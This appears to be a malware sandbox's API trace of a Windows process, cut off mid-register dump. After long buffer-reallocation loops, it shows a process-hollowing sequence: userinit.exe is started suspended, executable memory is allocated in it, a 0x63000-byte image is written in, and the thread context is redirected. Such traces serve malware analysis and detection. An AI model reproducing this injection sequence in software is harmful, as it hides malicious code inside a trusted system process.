[0250.730] GlobalReAlloc (hMem=0x189000c, dwBytes=0xc000, uFlags=0x2) returned 0x189000c
[0250.731] GlobalLock (hMem=0x189000c) returned 0x26f130
[0250.732] GlobalHandle (pMem=0x26f130) returned 0x189000c
[0250.732] GlobalUnlock (hMem=0x189000c) returned 0
[0250.732] GlobalReAlloc (hMem=0x189000c, dwBytes=0xe000, uFlags=0x2) returned 0x189000c
[0250.732] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.733] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.733] GlobalUnlock (hMem=0x189000c) returned 0
[0250.733] GlobalReAlloc (hMem=0x189000c, dwBytes=0x10000, uFlags=0x2) returned 0x189000c
[0250.733] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.734] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.734] GlobalUnlock (hMem=0x189000c) returned 0
[0250.734] GlobalReAlloc (hMem=0x189000c, dwBytes=0x12000, uFlags=0x2) returned 0x189000c
[0250.734] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.735] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.735] GlobalUnlock (hMem=0x189000c) returned 0
[0250.735] GlobalReAlloc (hMem=0x189000c, dwBytes=0x14000, uFlags=0x2) returned 0x189000c
[0250.735] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.736] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.736] GlobalUnlock (hMem=0x189000c) returned 0
[0250.736] GlobalReAlloc (hMem=0x189000c, dwBytes=0x16000, uFlags=0x2) returned 0x189000c
[0250.736] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.737] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.737] GlobalUnlock (hMem=0x189000c) returned 0
[0250.737] GlobalReAlloc (hMem=0x189000c, dwBytes=0x18000, uFlags=0x2) returned 0x189000c
[0250.737] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.738] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.738] GlobalUnlock (hMem=0x189000c) returned 0
[0250.738] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1a000, uFlags=0x2) returned 0x189000c
[0250.738] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.738] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.739] GlobalUnlock (hMem=0x189000c) returned 0
[0250.739] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1c000, uFlags=0x2) returned 0x189000c
[0250.739] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.739] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.739] GlobalUnlock (hMem=0x189000c) returned 0
[0250.740] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1e000, uFlags=0x2) returned 0x189000c
[0250.740] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.740] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.740] GlobalUnlock (hMem=0x189000c) returned 0
[0250.740] GlobalReAlloc (hMem=0x189000c, dwBytes=0x20000, uFlags=0x2) returned 0x189000c
[0250.741] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.741] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.741] GlobalUnlock (hMem=0x189000c) returned 0
[0250.741] GlobalReAlloc (hMem=0x189000c, dwBytes=0x22000, uFlags=0x2) returned 0x189000c
[0250.743] GlobalLock (hMem=0x189000c) returned 0x27b110
[0250.744] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0250.744] GlobalUnlock (hMem=0x189000c) returned 0
[0250.744] GlobalReAlloc (hMem=0x189000c, dwBytes=0x24000, uFlags=0x2) returned 0x189000c
[0250.744] GlobalLock (hMem=0x189000c) returned 0x27b110
[0250.745] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0250.745] GlobalUnlock (hMem=0x189000c) returned 0
[0250.745] GlobalReAlloc (hMem=0x189000c, dwBytes=0x26000, uFlags=0x2) returned 0x189000c
[0250.747] GlobalLock (hMem=0x189000c) returned 0x29f120
[0250.748] GlobalHandle (pMem=0x29f120) returned 0x189000c
[0250.748] GlobalUnlock (hMem=0x189000c) returned 0
[0250.748] GlobalReAlloc (hMem=0x189000c, dwBytes=0x28000, uFlags=0x2) returned 0x189000c
[0250.748] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.749] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.749] GlobalUnlock (hMem=0x189000c) returned 0
[0250.749] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2a000, uFlags=0x2) returned 0x189000c
[0250.749] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.750] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.750] GlobalUnlock (hMem=0x189000c) returned 0
[0250.750] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2c000, uFlags=0x2) returned 0x189000c
[0250.750] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.751] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.751] GlobalUnlock (hMem=0x189000c) returned 0
[0250.751] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2e000, uFlags=0x2) returned 0x189000c
[0250.751] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.752] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.752] GlobalUnlock (hMem=0x189000c) returned 0
[0250.752] GlobalReAlloc (hMem=0x189000c, dwBytes=0x30000, uFlags=0x2) returned 0x189000c
[0250.752] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.753] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.753] GlobalUnlock (hMem=0x189000c) returned 0
[0250.753] GlobalReAlloc (hMem=0x189000c, dwBytes=0x32000, uFlags=0x2) returned 0x189000c
[0250.753] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.754] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.754] GlobalUnlock (hMem=0x189000c) returned 0
[0250.754] GlobalReAlloc (hMem=0x189000c, dwBytes=0x34000, uFlags=0x2) returned 0x189000c
[0250.754] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.755] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.755] GlobalUnlock (hMem=0x189000c) returned 0
[0250.755] GlobalReAlloc (hMem=0x189000c, dwBytes=0x36000, uFlags=0x2) returned 0x189000c
[0250.755] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.756] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.756] GlobalUnlock (hMem=0x189000c) returned 0
[0250.756] GlobalReAlloc (hMem=0x189000c, dwBytes=0x38000, uFlags=0x2) returned 0x189000c
[0250.756] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.757] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.757] GlobalUnlock (hMem=0x189000c) returned 0
[0250.757] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3a000, uFlags=0x2) returned 0x189000c
[0250.757] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.758] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.758] GlobalUnlock (hMem=0x189000c) returned 0
[0250.758] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3c000, uFlags=0x2) returned 0x189000c
[0250.758] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.759] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.759] GlobalUnlock (hMem=0x189000c) returned 0
[0250.759] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3e000, uFlags=0x2) returned 0x189000c
[0250.759] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.760] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.760] GlobalUnlock (hMem=0x189000c) returned 0
[0250.760] GlobalReAlloc (hMem=0x189000c, dwBytes=0x40000, uFlags=0x2) returned 0x189000c
[0250.760] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.761] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.761] GlobalUnlock (hMem=0x189000c) returned 0
[0250.761] GlobalReAlloc (hMem=0x189000c, dwBytes=0x42000, uFlags=0x2) returned 0x189000c
[0250.761] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.762] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.762] GlobalUnlock (hMem=0x189000c) returned 0
[0250.762] GlobalReAlloc (hMem=0x189000c, dwBytes=0x44000, uFlags=0x2) returned 0x189000c
[0250.762] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.763] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.763] GlobalUnlock (hMem=0x189000c) returned 0
[0250.763] GlobalReAlloc (hMem=0x189000c, dwBytes=0x46000, uFlags=0x2) returned 0x189000c
[0250.763] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.811] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.811] GlobalUnlock (hMem=0x189000c) returned 0
[0250.811] GlobalReAlloc (hMem=0x189000c, dwBytes=0x48000, uFlags=0x2) returned 0x189000c
[0250.811] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.812] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.812] GlobalUnlock (hMem=0x189000c) returned 0
[0250.812] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4a000, uFlags=0x2) returned 0x189000c
[0250.812] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.813] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.813] GlobalUnlock (hMem=0x189000c) returned 0
[0250.813] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4c000, uFlags=0x2) returned 0x189000c
[0250.813] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.814] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.814] GlobalUnlock (hMem=0x189000c) returned 0
[0250.814] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4e000, uFlags=0x2) returned 0x189000c
[0250.814] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.815] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.815] GlobalUnlock (hMem=0x189000c) returned 0
[0250.815] GlobalReAlloc (hMem=0x189000c, dwBytes=0x50000, uFlags=0x2) returned 0x189000c
[0250.815] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.815] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.815] GlobalUnlock (hMem=0x189000c) returned 0
[0250.816] GlobalReAlloc (hMem=0x189000c, dwBytes=0x52000, uFlags=0x2) returned 0x189000c
[0250.816] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.816] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.816] GlobalUnlock (hMem=0x189000c) returned 0
[0250.816] GlobalReAlloc (hMem=0x189000c, dwBytes=0x54000, uFlags=0x2) returned 0x189000c
[0250.817] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.817] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.817] GlobalUnlock (hMem=0x189000c) returned 0
[0250.817] GlobalReAlloc (hMem=0x189000c, dwBytes=0x56000, uFlags=0x2) returned 0x189000c
[0250.817] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.818] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.818] GlobalUnlock (hMem=0x189000c) returned 0
[0250.818] GlobalReAlloc (hMem=0x189000c, dwBytes=0x58000, uFlags=0x2) returned 0x189000c
[0250.818] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.819] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.819] GlobalUnlock (hMem=0x189000c) returned 0
[0250.819] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5a000, uFlags=0x2) returned 0x189000c
[0250.819] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.820] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.820] GlobalUnlock (hMem=0x189000c) returned 0
[0250.820] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5c000, uFlags=0x2) returned 0x189000c
[0250.820] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.821] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.821] GlobalUnlock (hMem=0x189000c) returned 0
[0250.821] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5e000, uFlags=0x2) returned 0x189000c
[0250.821] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.822] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1b0c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1b0c10 | out: lpCommandLine="", lpProcessInformation=0x1b0c10*(hProcess=0x164, hThread=0x168, dwProcessId=0xb6c, dwThreadId=0xb14)) returned 1
[0250.825] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000
[0250.825] GetThreadContext (in: hThread=0x168, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0xa72be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x10f840, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0250.872] ReadProcessMemory (in: hProcess=0x164, lpBaseAddress=0x7ffd5008, lpBuffer=0x1b0c74, nSize=0x4, lpNumberOfBytesRead=0x1b0c7c | out: lpBuffer=0x1b0c74*, lpNumberOfBytesRead=0x1b0c7c*=0x4) returned 1
[0250.873] VirtualAllocEx (hProcess=0x164, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0250.873] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1f10000
[0250.873] VirtualAlloc (lpAddress=0x1f10000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x1f10000
[0250.874] VirtualAlloc (lpAddress=0x1ee0000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x1ee0000
[0250.880] WriteProcessMemory (in: hProcess=0x164, lpBaseAddress=0x400000, lpBuffer=0x1edf5c0*, nSize=0x63000, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1edf5c0*, lpNumberOfBytesWritten=0x1b0c7c*=0x63000) returned 1
[0250.893] WriteProcessMemory (in: hProcess=0x164, lpBaseAddress=0x7ffd5008, lpBuffer=0x1b0c78*, nSize=0x4, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1b0c78*, lpNumberOfBytesWritten=0x1b0c7c*=0x4) returned 1
[0250.893] SetThreadContext (hThread=0x168, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x10f840, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, 